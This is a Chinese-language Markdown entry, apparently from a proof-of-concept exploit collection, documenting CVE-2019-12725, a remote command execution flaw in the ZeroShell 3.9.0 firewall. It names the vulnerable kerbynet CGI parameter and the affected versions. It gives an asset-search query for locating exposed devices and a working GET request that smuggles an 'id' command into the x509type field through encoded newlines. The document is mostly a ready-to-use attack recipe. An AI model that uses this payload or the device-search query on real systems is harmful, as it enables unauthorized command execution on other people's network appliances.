Awesome-POC/网络设备漏洞/ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725.md
2024-11-06 14:10:36 +08:00

33 lines
529 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725
## 漏洞描述
ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面x509type 参数过滤不严格,导致攻击者可执行任意命令
## 漏洞影响
```
ZeroShell < 3.9.0
```
## 网络测绘
```
app="Zeroshell-防火墙"
```
## 漏洞复现
登录页面如下
![](images/202202162258497.png)
验证的POC为
```plain
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
```
![](images/202202162258777.png)